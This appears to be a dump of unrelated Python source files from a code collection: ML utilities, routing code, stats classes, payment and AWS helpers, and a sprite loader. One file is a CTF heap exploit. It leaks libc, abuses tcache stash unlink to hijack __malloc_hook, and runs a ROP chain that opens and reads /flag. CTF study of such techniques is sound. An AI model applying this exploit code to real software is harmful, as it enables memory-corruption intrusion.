# w = tf.get_variable("w", wshape, initializer=ortho_init(init_scale))
# b = tf.get_variable("b", bias_var_shape, initializer=bias_initializer)
# if not one_dim_bias and data_format == 'NHWC':
# b = tf.reshape(b, bshape)
# return b + tf.nn.conv2d(x, w, strides=strides, padding=pad, data_format=data_format)
#
#
#def deconv(x, scope, *, nf, rf, stride, init_scale=1.0, data_format='NHWC'):
# if data_format == 'NHWC':
# channel_ax = 3
# strides = (stride, stride)
# #strides = [1, stride, stride, 1]
# elif data_format == 'NCHW':
# channel_ax = 1
# strides = (stride, stride)
# #strides = [1, 1, stride, stride]
# else:
# raise NotImplementedError
#
# with tf.variable_scope(scope):
# out = tf.contrib.layers.conv2d_transpose(x,
# num_outputs=nf,
# kernel_size=rf,
# stride=strides,
# padding='VALID',
# weights_initializer=ortho_init(init_scale),
# biases_initializer=tf.constant_initializer(0.0),
# activation_fn=None,
# data_format=data_format)
# return out
#
#
#def ortho_init(scale=1.0):
# def _ortho_init(shape, dtype, partition_info=None):
# #lasagne ortho init for tf
# shape = tuple(shape)
# if len(shape) == 2:
# flat_shape = shape
# elif len(shape) == 4: # assumes NHWC
# flat_shape = (np.prod(shape[:-1]), shape[-1])
# else:
# raise NotImplementedError
# a = np.random.normal(0.0, 1.0, flat_shape)
# u, _, v = np.linalg.svd(a, full_matrices=False)
# q = u if u.shape == flat_shape else v # pick the one with the correct shape
# q = q.reshape(shape)
# return (scale * q[:shape[0], :shape[1]]).astype(np.float32)
# return _ortho_init
def tile_images(array, n_cols=None, max_images=None, div=1):
if max_images is not None:
array = array[:max_images]
if len(array.shape) == 4 and array.shape[3] == 1:
array = array[:, :, :, 0]
assert len(array.shape) in [3, 4], "wrong number of dimensions - shape {}".format(array.shape)
if len(array.shape) == 4:
assert array.shape[3] == 3, "wrong number of channels- shape {}".format(array.shape)
if n_cols is None:
n_cols = max(int(np.sqrt(array.shape[0])) // div * div, div)
n_rows = int(np.ceil(float(array.shape[0]) / n_cols))
def cell(i, j):
ind = i * n_cols + j
return array[ind] if ind < array.shape[0] else np.zeros(array[0].shape)
def row(i):
return np.concatenate([cell(i, j) for j in range(n_cols)], axis=1)
return np.concatenate([row(i) for i in range(n_rows)], axis=0)
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
#from mpi4py import MPI
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
#def explained_variance_non_mpi(ypred,y):
# """
# Computes fraction of variance that ypred explains about y.
# Returns 1 - Var[y-ypred] / Var[y]
#
# interpretation:
# ev=0 => might as well have predicted zero
# ev=1 => perfect prediction
# ev<0 => worse than just predicting zero
#
# """
# assert y.ndim == 1 and ypred.ndim == 1
# vary = np.var(y)
# return np.nan if vary==0 else 1 - np.var(y-ypred)/vary
#
#def mpi_var(x):
# return mpi_moments(x)[1]**2
#
#def explained_variance(ypred,y):
# """
# Computes fraction of variance that ypred explains about y.
# Returns 1 - Var[y-ypred] / Var[y]
#
# interpretation:
# ev=0 => might as well have predicted zero
# ev=1 => perfect prediction
# ev<0 => worse than just predicting zero
#
# """
# assert y.ndim == 1 and ypred.ndim == 1
# vary = mpi_var(y)
# return np.nan if vary==0 else 1 - mpi_var(y-ypred)/vary
def add_noise(img, noise_p, noise_type):
noise_mask = np.random.binomial(1, noise_p, size=img.shape[0]).astype(np.bool)
w = 12
n = 84//12
idx_list = np.arange(n*n)
random.shuffle(idx_list)
idx_list = idx_list[:np.random.randint(10, 40)]
for i in range(img.shape[0]):
if not noise_mask[i]:
continue
for idx in idx_list:
y = (idx // n)*w
x = (idx % n)*w
img[i, y:y+w, x:x+w, -1] += np.random.normal(0, 255*0.3, size=(w,w)).astype(np.uint8)
img = np.clip(img, 0., 255.)
return img
g_font = [None]
def draw_text_to_image(text, height=None, width=None, channels=None):
from PIL import Image, ImageDraw, ImageFont
if g_font[0] is None:
g_font[0] = ImageFont.load_default()
font = g_font[0]
# ImageFont.ImageFont.getsize doesn't work for multi-line strings.
# https://github.com/python-pillow/Pillow/issues/2966
#text_size = font.getsize(text)
dummy_img = Image.fromarray(np.zeros((1, 1), dtype=np.uint8))
dummy_draw = ImageDraw.Draw(dummy_img)
text_size = dummy_draw.textsize(text, font=font)
if channels is None:
shape = (height or text_size[1], width or text_size[0])
else:
shape = (height or text_size[1], width or text_size[0], channels)
i = np.zeros(shape, dtype=np.uint8)
img = Image.fromarray(i)
draw = ImageDraw.Draw(img)
draw.text((3, 0), text, font=font, fill=(255,)*channels)
return np.asarray(img)
def get_percentile_indices(data, percentiles=np.arange(0.0, 1.05, 0.1)):
assert len(data.shape) == 1
data_asc = np.argsort(data)
percentile_indices = (percentiles * (len(data_asc) - 1)).astype(int)
percentile_indices = data_asc[percentile_indices]
#assert np.all(data[percentile_indices[:-1]] <= data[percentile_indices[1:]])
return percentile_indices
class CContext():
def __init__(self, verbose=False, print_func=print):
self._state_funcs = OrderedDict()
self._evaluated_states = OrderedDict()
self._dependencies = defaultdict(set)
self._eval_context = []
self._verbose = verbose
self._print_func = print_func
def register_state(self, name, create):
if name in self._state_funcs:
raise Exception('State already registered: {}'.format(name))
self._state_funcs[name] = create
def invalidate_state(self, name):
if name not in self._evaluated_states:
return
del self._evaluated_states[name]
if self._verbose:
self._print_func('Invalidated state "{}"'.format(name))
for n in self._dependencies[name]:
self.invalidate_state(n)
del self._dependencies[name]
def __getattr__(self, attr):
if attr not in self._state_funcs:
raise Exception('Unknown state {}'.format(attr))
if attr in self._eval_context:
raise Exception('Circular dependency detected: {}, {}'.format(attr, self._eval_context))
self._dependencies[attr] = self._dependencies[attr].union(set(self._eval_context))
if attr not in self._evaluated_states:
self._eval_context.append(attr)
evaluated_state = self._state_funcs[attr](self)
if self._verbose:
self._print_func('Evaluated state "{}"'.format(attr))
self._eval_context.pop()
self._evaluated_states[attr] = evaluated_state
return self._evaluated_states[attr]
class EmptyClass():
pass
# From https://github.com/openai/large-scale-curiosity/blob/0c3d179fd61ee46233199d0891c40fbe7964d3aa/cppo_agent.py#L226-L236
class RewardForwardFilter(object):
def __init__(self, gamma):
self.rewems = None
self.gamma = gamma
def update(self, rews):
if self.rewems is None:
self.rewems = rews
else:
self.rewems = self.rewems * self.gamma + rews
return self.rewems
class RunningMeanStd(object):
# https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
def __init__(self, epsilon=1e-4, shape=()):
self.mean = np.zeros(shape, 'float64')
self.var = np.ones(shape, 'float64')
self.count = epsilon
def update(self, x):
batch_mean = np.mean(x, axis=0)
batch_var = np.var(x, axis=0)
batch_count = x.shape[0]
self.update_from_moments(batch_mean, batch_var, batch_count)
def update_from_moments(self, batch_mean, batch_var, batch_count):
self.mean, self.var, self.count = update_mean_var_count_from_moments(
self.mean, self.var, self.count, batch_mean, batch_var, batch_count)
class SimpleWeightedMovingScalarMeanStd():
def __init__(self, alpha=0.0001):
self._alpha = alpha
self.mean = 0.0
self.var = 1.0
def update(self, values):
self.mean = (1 - self._alpha) * self.mean + self._alpha * np.mean(values)
self.var = (1 - self._alpha) * self.var + self._alpha * np.mean(np.square(values - self.mean))
def update_mean_var_count_from_moments(mean, var, count, batch_mean, batch_var, batch_count):
delta = batch_mean - mean
tot_count = count + batch_count
new_mean = mean + delta * batch_count / tot_count
m_a = var * count
m_b = batch_var * batch_count
M2 = m_a + m_b + np.square(delta) * count * batch_count / tot_count
new_var = M2 / tot_count
new_count = tot_count
return new_mean, new_var, new_count
| 10,853 | 3,856 |
class Location:
def __init__(self, x : int, y : int):
self.x = x
self.y = y
def getX(self) -> int:
return self.x
def getY(self) -> int:
return self.y
def __eq__(self, value):
return self.x == value.x and self.y == value.y
def __hash__(self):
return hash("%d %d" % (self.x, self.y))
class Placement:
def __init__(self,code: int, pawnType: int, location: Location):
self.code = code
self.pawnType = pawnType
self.location = location
def getLocation(self) -> Location:
return self.location
def getPawnType(self) -> int:
return self.pawnType
def getPawnSymbol(self) -> str:
if self.pawnType == 0:
return "X"
elif self.pawnType == 1:
return "O"
return "N"
def getRoomCode(self) -> int:
return self.code
| 901 | 302 |
from adapters.lumi.aqara_opple_switch import AqaraOppleSwitch
class WXCJKG13LM(AqaraOppleSwitch):
def __init__(self):
buttons_count = 6
super().__init__(buttons_count)
| 191 | 78 |
"""Module of commonly shared functions of various flavours of CGR."""
import math
def cgr_neighbor_function(contact_graph, node, destination, current_distance,
set_visited, suppressed_contacts, lookahead_time):
"""Neighbor function of CGR used by the Dijkstra algorithm.
Used to determine feasible direct neigbors of a given node.
Args:
contact_graph (ContactGraph): The topology information in the form
of a contact graph
node (tuple): The evaluated node in the contact graph node form
``(from_node, to_node, from_time, to_time, data_rate)``.
destination (tuple): The nominal destination node in the form
``(destination_id, destination_id, 0, math.inf, math.inf)``
current_distance (int): Contains the weight of the shortest path
to the currently investigated node (in ms).
set_visited (set): Set used for storing the visited flag
of nodes during the Dijkstra runs. Also used for excluding
suppressed (physical) nodes.
suppressed_contacts (list): List of contacts that shall not be
considered for forwarding (and thus neighbor selection)
lookahead_time (int): Time value that specifies a time window
(or rather a maximum time) only in which routes are searched.
This reduces the time necessary to find a shortest route.
Returns:
list: A list of all feasible neighbors with items of the form
``(<node_id>, weight)`` with ``<node_id>`` representing a certain
contact in the contact graph.
"""
neighbors = []
# Set the node as visited
set_visited.add(node.from_node)
# Extract the start time of the given node
for edge in contact_graph.graph[node].successors:
# Break the loop if the found edge to_time is smaller than the
# current distance. As the successor list is sorted, all subsequent
# edges will be smaller as well.
if edge.to_time <= current_distance:
break
# Only consider when neigbor has not been visited by dijkstra yet
# and it is not in the suppressed_contacts list
# and can be reached given the currently consideret point in time
# and if it is within the lookahead window (only when a lookahead
# window is used)
if ((lookahead_time is None or edge.from_time < lookahead_time)
and edge.to_node not in set_visited
and edge not in suppressed_contacts
and (edge.to_time > current_distance)):
# Only add to neighbors if no artificial end node or artificial end
# node is bundle's destination
if edge == destination or edge.from_node != edge.to_node:
# Calculate the time (which is either positive or 0, relevant
# for artificial terminal nodes)
weight = edge.from_time - current_distance
weight = max(weight, 0)
# Append to neighbor list with weight
neighbors.append((edge, weight))
return neighbors
def cgr_get_route_characteristics(route, distance):
"""Calculate characteristics of a certain route.
Args:
route (list): A list of the nodes of the calculated route that's
elements comprise of all relevant information for determining the
characteristics'
distance (int): The precalculated distance
Returns:
tuple: A tuple consisting of the (precalculated) distance, the capacity
and the end time of the availability of that route
"""
capacity = math.inf
distance = 0
# Iterate over all nodes in route and check if capacity is smaller than
# already found minimum
for node in route:
distance = max(distance, node.from_time)
# Generate capacity for node's contact
capacity_new = ((node.to_time - distance) * node.datarate)
# Update capacity if smaller
if capacity_new < capacity:
capacity = capacity_new
# The to_time of a route is the minimum end time of a contact within this
# route (minus the assumed signal propagation delay, in the rr considered
# to be neglegible)
to_time = min([node.to_time for node in route])
# Return the characteristics tuple consisting of the route distance (i.e.
# the arrival time), the route capacity and the route availability end
# time (i.e. the to-time)
return (distance, capacity, to_time)
| 4,565 | 1,150 |
from dataclasses import dataclass
from typing import Callable
from rxbp.multicast.multicastobserver import MultiCastObserver
from rxbp.multicast.typing import MultiCastItem
@dataclass
class MapMultiCastObserver(MultiCastObserver):
source: MultiCastObserver
func: Callable[[MultiCastItem], MultiCastItem]
def on_next(self, item: MultiCastItem) -> None:
try:
def map_gen():
for v in item:
yield self.func(v)
next = map_gen()
except Exception as exc:
self.source.on_error(exc)
else:
self.source.on_next(next)
def on_error(self, exc: Exception) -> None:
self.source.on_error(exc)
def on_completed(self) -> None:
self.source.on_completed() | 785 | 235 |
Score = 0
for For3Scores in range(1,4):
Average = int(input())
Score += Average
print((Score/3))
| 112 | 53 |
from decouple import config
RANGE_OF_PRIME_NUMBERS = {
"min": 10,
"max": 190
}
DATABASE = {
'type': config("TYPE"),
'user': config("USER"),
'password': config("PASSWORD"),
'localhost': config("LOCALHOST"),
'database_name': config("DATABASE_NAME")
}
PATH_FOR_PUBLIC_KEY = "/home/risoko/Pulpit/public_key"
KEYS_EXPIRE = {
"DAYS": 0,
"MINUTES": 10,
"SECONDS": 0
} | 415 | 170 |
with open('./data/data2017.txt') as f:
lines = f.readlines()
for ln in lines:
ln = ln.replace(',', '').replace(':', '').replace('int64', '') \
.replace('Name', '').replace('dtype', '').replace('/', ' ') \
.replace('object', '').replace('float64', ' ') \
.replace('NaN', '').replace('NaN', ' ') \
.replace('.', ' ')
text = ln.split()
if text[0].isnumeric():
text.pop(0)
if text[0].isnumeric():
text.pop(0)
if text[0].isnumeric():
text.pop(0)
if not text[1].isnumeric():
text[0] = f'{text[0]} {text[1]}'
text.pop(1)
if not text[2].isnumeric():
text.insert(2, '0')
text.insert(3, '0')
if not text[1].isnumeric():
text[0] = f'{text[0]} {text[1]}'
text.pop(1)
if len(text) > 6 and not text[5].isnumeric():
text[4] = f'{text[4]} {text[5]}'
text.pop(5)
if len(text) > 6 and not text[5].isnumeric():
text[4] = f'{text[4]} {text[5]}'
text.pop(5)
if len(text) > 7 and not text[6].isnumeric():
text.insert(6, '0')
text.insert(7, '0')
if len(text) > 9 and not text[9].isnumeric():
text[8] = f'{text[8]} {text[9]}'
text.pop(9)
if len(text) > 9 and not text[9].isnumeric():
text[8] = f'{text[8]} {text[9]}'
text.pop(9)
if len(text) > 9 and not text[9].isnumeric():
text[8] = f'{text[8]} {text[9]}'
text.pop(9)
if len(text) > 7 and not text[7].isnumeric():
text.insert(7, '0')
text.insert(9, '0')
if len(text) == 10:
text.insert(9, '0')
if len(text) == 10:
text.insert(9, '0')
if len(text) == 11 and text[9].isnumeric() and int(text[9].strip())>100:
text.insert(9, '0')
if len(text) == 7:
text.insert(1, '0')
text.insert(3, '0')
text.insert(6, '0')
text.insert(7, '0')
text.insert(9, '0')
notwanted = ['-------------------------------', 'CONSTITUENCY_NAME', 'GRAND TOTAL', 'CAW']
if not set(text) & set(notwanted):
text.insert(0, f'{len(text)}')
s = ','.join(text)
print(f' {s}')
| 2,413 | 874 |
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
import cv2 as cv
"""
形态学分析应用 - 使用基本梯度对轮廓进行分析处理
使用形态学的二值化处理,对是别内容进行轮廓分析,在OCR上是其处理的手段之一,相比于threshold的二值化而言,对图像会有更好的分割效
果,技术路线如下:
1 图像形态学梯度
2 灰度
3 全局阈值二值化
4 轮廓分析
"""
def main():
src = cv.imread("../../pic/1.jpg")
blur = cv.medianBlur(src, 3)
kernel = cv.getStructuringElement(cv.MORPH_RECT, (3, 3))
gradient = cv.morphologyEx(blur, cv.MORPH_GRADIENT, kernel)
cv.imshow("gradient", gradient)
gray = cv.cvtColor(gradient, cv.COLOR_BGR2GRAY)
_, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
cv.imshow("binary", binary)
# binary = cv.morphologyEx(binary, cv.MORPH_DILATE, cv.getStructuringElement(cv.MORPH_CROSS, (3, 3))) # 膨胀 3*3 十字交叉
contours, _ = cv.findContours(binary, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
if 0 == len(contours):
print("未搜寻到结果")
return
for index in range(len(contours)):
contour = contours[index]
x, y, w, h = cv.boundingRect(contour) # 获取最大外接矩形
area = cv.contourArea(contour) # 获取轮廓面积
if not 10 < area < 500 or not 10 < h < 60:
continue
cv.rectangle(src, (x, y), (x + w, y + h), (0, 0, 255), 2, cv.LINE_8)
cv.imshow("src", src)
cv.waitKey(0)
cv.destroyAllWindows()
if "__main__" == __name__:
main()
| 1,423 | 747 |
import sys
from loguru import logger
from rich.console import Console, RenderGroup
from rich.panel import Panel
from vaccibot.constants import LOGURU_FORMAT
from vaccibot.parsing import ARGS
from vaccibot.process import retrieve_all_suitable_appointments
from vaccibot.render import make_department_table
logger.remove()
logger.add(sys.stdout, level=f"{ARGS.logs.upper()}", format=LOGURU_FORMAT)
@logger.catch()
def main() -> None:
"""Parses arguments from the commandline, fetches data and renders it in the terminal."""
console = Console()
panels = []
suitable_appointments: dict = retrieve_all_suitable_appointments()
for department, appointments in suitable_appointments.items():
if appointments: # do not make a panel and table if no appointments found
panels.append(
Panel(
make_department_table(appointments),
title=department,
expand=True,
border_style="scope.border",
)
)
console.print(*panels)
if __name__ == "__main__":
main()
| 1,118 | 317 |
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
pop_rdi_ret = 0x26542
pop_rsi_ret = 0x26f9e
pop_rdx_ret = 0x12bda6
pop_rax_ret = 0x47cf8
syscall_ret = 0xcf6c5
def debut(idx, size, name="a"):
if isinstance(name, str):
pad = "a"
else:
pad = b"a"
name = name.ljust(size, pad)
p.sendlineafter("> ", "1")
p.sendlineafter("idx: ", str(idx))
p.sendafter("hero name: ", name)
def rename(idx, name):
p.sendlineafter("> ", "2")
p.sendlineafter("idx: ", str(idx))
p.sendafter("hero name: ", name)
def show(idx):
p.sendlineafter("> ", "3")
p.sendlineafter("idx: ", str(idx))
p.recvuntil("hero name: ")
return u64(p.recvline()[:-1].ljust(8, b"\x00"))
def retire(idx):
p.sendlineafter("> ", "4")
p.sendlineafter("idx: ", str(idx))
def punch(data):
p.sendlineafter("> ", "50056")
p.send(data)
p.recvuntil("Serious Punch!!!\n")
# use tcachebin stach unlink, while has 5, to malloc at any address
def attack1():
debut(0, 0x400)
retire(0)
debut(1, 0x400)
retire(1)
heap_base_addr = show(1) - 0x260
log_address("heap_base_addr", heap_base_addr)
for i in range(5):
debut(0, 0x400)
retire(0)
debut(0, 0x400)
for i in range(5):
debut(1, 0x210)
retire(1)
retire(0)
libc_base_addr = show(0) - 0x1e4ca0
libc.address = libc_base_addr
log_address("libc_base_addr", libc_base_addr)
# split chunk
debut(1, 0x1e0)
# get smallbin chunk
debut(1, 0x400)
payload = flat({
0: [0, 0x221, heap_base_addr + 0x20b0, libc_base_addr + 0x1e4bf8],
0x1e0: [0, 0x221, 0xdeadbeef, heap_base_addr + 0x1ed0]
}, filler="\x00")
rename(0, payload)
# to trigger tcache stash unlink
debut(1, 0x210)
# to change __malloc_hook
payload = flat({
0x20: "/flag\x00\x00\x00",
0x28: libc_base_addr + 0x99540
})
punch(payload)
layout = [
libc_base_addr + pop_rdi_ret, # rdi
libc.sym["__malloc_hook"] - 8,
libc_base_addr + pop_rsi_ret, # rsi
0,
libc_base_addr + pop_rax_ret, # rax
2, # open("/flag", 0)
libc_base_addr + syscall_ret, # syscall
libc_base_addr + pop_rdi_ret,
3,
libc_base_addr + pop_rsi_ret,
heap_base_addr + 0x400,
libc_base_addr + pop_rdx_ret,
0x30,
libc_base_addr + pop_rax_ret,
0, # read
libc_base_addr + syscall_ret,
libc_base_addr + pop_rdi_ret,
1,
libc_base_addr + pop_rax_ret,
1,
libc_base_addr + syscall_ret
]
debut(1, 0x300, flat(layout))
p.interactive()
# use tcachebin stach unlink, while has 6, to write heap address at any address
def attack2():
debut(0, 0x400)
retire(0)
debut(1, 0x400)
retire(1)
heap_base_addr = show(1) - 0x260
log_address("heap_base_addr", heap_base_addr)
for i in range(5):
debut(0, 0x400)
retire(0)
debut(0, 0x400)
for i in range(6):
debut(1, 0x2f0)
retire(1)
debut(2, 0x210)
retire(2)
# stop()
retire(0)
libc_base_addr = show(0) - 0x1e4ca0
libc.address = libc_base_addr
log_address("libc_base_addr", libc_base_addr)
# split chunk
debut(1, 0x100)
# get smallbin chunk
debut(1, 0x400)
payload = flat({
0: [0, 0x301, heap_base_addr + 0x1fd0, heap_base_addr + 0x20 - 5],
0x100: [0, 0x301, 0xdeadbeef, heap_base_addr + 0x1ed0]
}, filler="\x00")
rename(0, payload)
# to trigger tcache stash unlink
debut(1, 0x2f0)
stop()
rename(2, p64(libc.sym['__malloc_hook']-8))
punch("a" * 0x60)
punch(b"/flag\x00\x00\x00" + p64(libc_base_addr + 0x8cfd6)) # add rsp 0x48; ret
layout = [
libc_base_addr + pop_rdi_ret, # rdi
libc.sym["__malloc_hook"] - 8,
libc_base_addr + pop_rsi_ret, # rsi
0,
libc_base_addr + pop_rax_ret, # rax
2, # open("/flag", 0)
libc_base_addr + syscall_ret, # syscall
libc_base_addr + pop_rdi_ret,
3,
libc_base_addr + pop_rsi_ret,
heap_base_addr + 0x400,
libc_base_addr + pop_rdx_ret,
0x30,
libc_base_addr + pop_rax_ret,
0, # read
libc_base_addr + syscall_ret,
libc_base_addr + pop_rdi_ret,
1,
libc_base_addr + pop_rax_ret,
1,
libc_base_addr + syscall_ret
]
debut(1, 0x300, flat(layout))
p.interactive()
attack2() | 4,618 | 2,093 |
import voluptuous as vol
from pi4home.components import text_sensor
import pi4home.config_validation as cv
from pi4home.const import CONF_ID, CONF_LAMBDA, CONF_NAME, CONF_TEXT_SENSORS
from pi4home.cpp_generator import add, process_lambda, variable
from pi4home.cpp_types import std_vector
CustomTextSensorConstructor = text_sensor.text_sensor_ns.class_('CustomTextSensorConstructor')
PLATFORM_SCHEMA = text_sensor.PLATFORM_SCHEMA.extend({
cv.GenerateID(): cv.declare_variable_id(CustomTextSensorConstructor),
vol.Required(CONF_LAMBDA): cv.lambda_,
vol.Required(CONF_TEXT_SENSORS):
cv.ensure_list(text_sensor.TEXT_SENSOR_SCHEMA.extend({
cv.GenerateID(): cv.declare_variable_id(text_sensor.TextSensor),
})),
})
def to_code(config):
for template_ in process_lambda(config[CONF_LAMBDA], [],
return_type=std_vector.template(text_sensor.TextSensorPtr)):
yield
rhs = CustomTextSensorConstructor(template_)
custom = variable(config[CONF_ID], rhs)
for i, conf in enumerate(config[CONF_TEXT_SENSORS]):
rhs = custom.Pget_text_sensor(i)
add(rhs.set_name(conf[CONF_NAME]))
text_sensor.register_text_sensor(rhs, conf)
BUILD_FLAGS = '-DUSE_CUSTOM_TEXT_SENSOR'
| 1,277 | 448 |
import math
import operator
import six
class NegativePopulationSize(ValueError):
def __init__(self, typename):
self.typename = typename
ValueError.__init__(self)
def __str__(self):
return str(str(self))
def __unicode__(self):
return "More calls to %(type)s.remove() than to %(type)s.add()" % {"type": self.typename}
class NonPositivePopulationSize(ValueError):
def __init__(self, typename):
self.typename = typename
ValueError.__init__(self)
def __str__(self):
return str(str(self))
def __unicode__(self):
return "Need more calls to %(type)s.add() than to %(type)s.remove()" % {"type": self.typename}
class AbstractStdDev(object):
def get(self):
return math.sqrt(self.getSqr())
def __add__(self, other):
return StdDevSum(self.getSqr() + other.getSqr())
class StdDevSum(AbstractStdDev):
def __init__(self, sqr):
self.sqr = sqr
def getSqr(self):
return self.sqr
class StdDev(AbstractStdDev):
def __init__(self):
self.count = 0
self.sum = 0
self.sqrsum = 0
def add(self, value):
self.count += 1
self.sum += value
self.sqrsum += value**2
def remove(self, value):
if self.count < 1:
raise NonPositivePopulationSize("StdDev")
self.count -= 1
self.sum -= value
self.sqrsum -= value**2
def getSqr(self):
if self.count < 1:
raise NonPositivePopulationSize("StdDev")
a = self.sqrsum/self.count
b = (self.sum/self.count)**2
# Handle rounding errors
# FIXME: find out what values this happened for and make a test...
if a < b: # pragma: no cover
assert b - a < 1e-3
return 0.0
return a - b
class Avg(object):
def __init__(self):
self.count = 0
self.sum = 0
def add(self, value):
self.count += 1
self.sum += value
def remove(self, value):
if self.count <= 1:
raise NonPositivePopulationSize("Avg")
self.count -= 1
self.sum -= value
def get(self):
if self.count < 1:
raise NonPositivePopulationSize("Avg")
return self.sum/self.count
class Sum(object):
def __init__(self):
self.count = 0
self.sum = 0
def add(self, value):
self.count += 1
self.sum += value
def remove(self, value):
if self.count <= 0:
raise NegativePopulationSize("Sum")
self.count -= 1
self.sum -= value
def get(self):
return self.sum
class Count(object):
def __init__(self):
self.count = 0
def add(self, value):
self.count += 1
def remove(self, value):
# Fast failure
if self.count <= 0:
raise NegativePopulationSize("Sum")
self.count -= 1
def get(self):
return self.count
class Stat(object):
def __init__(self, source, cls):
self.source = source
self.value = cls()
def add(self, value):
if self.source in value:
self.value.add(value[self.source])
def remove(self, value):
if self.source in value:
self.value.remove(value[self.source])
def get(self):
return self.value.get()
class StatSum(object):
def __init__(self, *stats):
self.stats = stats
def add(self, value):
for stat in self.stats:
stat.add(value)
def remove(self, value):
for stat in self.stats:
stat.remove(value)
def get(self):
summed = self.stats[0].value
for x in self.stats[1:]:
summed = summed + x.value
return summed.get()
# return reduce(operator.add, [stat.value for stat in self.stats]).get()
class Stats(object):
"""
stat = Stats({
"latitude": Stat("latitude", Avg),
"longitude": Stat("longitude", Avg),
"sigma": StatSum(Stat("latitude", StdDev),
Stat("longitude", StdDev))})
stat.add({'latitude': 4.3, 'longitude': 3.2})
print stat.get()['sigma']
"""
def __init__(self, fieldmap):
self.fieldmap = fieldmap
def add(self, value):
for field in six.itervalues(self.fieldmap):
field.add(value)
def remove(self, value):
for field in six.itervalues(self.fieldmap):
field.remove(value)
def get(self):
return {
key: value.get()
for (key, value)
in six.iteritems(self.fieldmap)}
| 4,589 | 1,449 |
import braintree
from braintree.configuration import Configuration
class TransparentRedirect:
"""
A class used for Transparent Redirect operations
"""
class Kind(object):
CreateCustomer = "create_customer"
UpdateCustomer = "update_customer"
CreatePaymentMethod = "create_payment_method"
UpdatePaymentMethod = "update_payment_method"
CreateTransaction = "create_transaction"
@staticmethod
def confirm(query_string):
"""
Confirms a transparent redirect request. It expects the query string from the
redirect request. The query string should _not_ include the leading "?" character. ::
result = braintree.TransparentRedirect.confirm("foo=bar&id=12345")
"""
return Configuration.gateway().transparent_redirect.confirm(query_string)
@staticmethod
def tr_data(data, redirect_url):
return Configuration.gateway().transparent_redirect.tr_data(data, redirect_url)
@staticmethod
def url():
"""
Returns the url for POSTing Transparent Redirect HTML forms
"""
return Configuration.gateway().transparent_redirect.url()
| 1,186 | 299 |
# coding=utf-8
from .misc import AbstractAttribTracer
from .transformer import AbstractDataTransformer
from .translator import AbstractTranslator
from .translator_hub import AbstractTranslatorsHub
| 197 | 56 |
import argparse
import psutil
from ..awsumepy.lib.aws_files import delete_section, get_aws_files, read_aws_file
from ..awsumepy.lib.logger import logger
def kill_autoawsume():
logger.debug('Killing autoawsume')
for proc in psutil.process_iter():
try:
for command_string in proc.cmdline():
if 'autoawsume' in command_string:
proc.kill()
except Exception:
pass
def kill(arguments: argparse.Namespace):
_, credentials_file = get_aws_files(None, None)
if arguments.profile_name:
logger.debug('Stoping auto-refresh of profile {}'.format(arguments.profile_name))
profiles = read_aws_file(credentials_file)
if 'autoawsume-{}'.format(arguments.profile_name) in profiles:
delete_section('autoawsume-{}'.format(arguments.profile_name), credentials_file)
profiles.pop('autoawsume-{}'.format(arguments.profile_name))
if arguments.profile_name in profiles and profiles[arguments.profile_name].get('autoawsume'):
delete_section(arguments.profile_name, credentials_file)
profiles.pop(arguments.profile_name)
autoawsume_profiles = [{k: v} for k, v in profiles.items() if v.get('autoawsume')]
if any(autoawsume_profiles):
print('Stop {}'.format(arguments.profile_name))
return
else:
logger.debug('There were not more autoawsume profiles, stopping autoawsume')
print('Kill')
kill_autoawsume()
else:
logger.debug('Stopping all auto refreshing and removing autoawsume profiles')
kill_autoawsume()
profiles = read_aws_file(credentials_file)
for profile in profiles:
if 'autoawsume-' in profile or profiles[profile].get('autoawsume'):
delete_section(profile, credentials_file)
print('Kill')
| 1,902 | 522 |
import json
import os
import gc
from .app import get_screen
from .utils import Rect
from .bitmatrix import BitMatrix
class SpritesManager:
def __init__(self):
self.free_indices = []
self.last_used = -1
self.limit = 160
def clear(self):
self.free_indices = []
self.last_used = -1
def allocate(self, data):
if len(self.free_indices) > 0:
sprite_id = self.free_indices[-1]
del self.free_indices[-1]
else:
sprite_id = self.last_used + 1
if sprite_id >= self.limit:
return -1
self.last_used = sprite_id
get_screen().set_sprite(sprite_id, data)
return sprite_id
sprites_manager = SpritesManager()
class SpriteSheet:
def __init__(self, filename=''):
self.width = 0
self.height = 0
self.data = None
self.sprites = {}
self.rect = None
if filename:
self.load(filename)
def clean(self):
self.data = None
gc.collect()
def load(self, filename):
try:
gc.collect()
print("Loading "+filename)
print("Free Mem: "+str(gc.mem_free()))
with open(filename, 'rb') as f:
data = f.read(4)
self.width = (int(data[1]) << 8) | int(data[0])
self.height = (int(data[3]) << 8) | int(data[2])
data = None
self.data = f.read()
self.rect = Rect(0, 0, self.width, self.height)
return True
except OSError:
return False
def get_sprite_data(self, rect):
if rect in self.sprites:
return self.sprites.get(rect)
if rect.valid() and self.rect.contains(rect) and rect.width() == 32 and rect.height() == 32:
data = bytearray(32 * 32 * 2)
src = (rect.tl.y * self.width + rect.tl.x) * 2
dst = 0
mask = BitMatrix(32, 32)
mask.setall(True)
for i in range(32):
data[dst:(dst + 64)] = self.data[src:(src + 64)]
for j in range(32):
if data[dst + j * 2] == 0x20 and data[dst + j * 2 + 1] == 0:
mask.set(j, i, False)
dst = dst + 64
src = src + self.width * 2
sprite_data = sprites_manager.allocate(bytes(data)), mask
self.sprites[rect] = sprite_data
else:
sprite_data = -1, None
return sprite_data
sprite_sheets = {}
def get_sprite_sheet(filename):
if filename in sprite_sheets:
return sprite_sheets.get(filename)
s = SpriteSheet(filename)
sprite_sheets[filename] = s
return s
# EXPORT
class Sprite(object):
def __init__(self, sprite_id, mask, duration=0.0, flags=0):
self.sprite_id = sprite_id
self.mask = mask
self.duration = duration
self.flags = flags
def draw(self, position):
get_screen().draw_sprite(position.x, position.y, self.sprite_id, self.flags)
@staticmethod
def get_rect():
return Rect(0, 0, 32, 32)
@staticmethod
def deserialize(filename, obj):
r = [int(a) for a in obj['Rect'].strip().split(',')]
dur = obj['Duration']
flags = 0
if 'Flags' in obj:
flags = obj['Flags']
rect = Rect(r[0], r[1], r[2], r[3])
sheet = get_sprite_sheet(filename)
sprite_id, mask = sheet.get_sprite_data(rect)
return Sprite(sprite_id, mask, dur, flags)
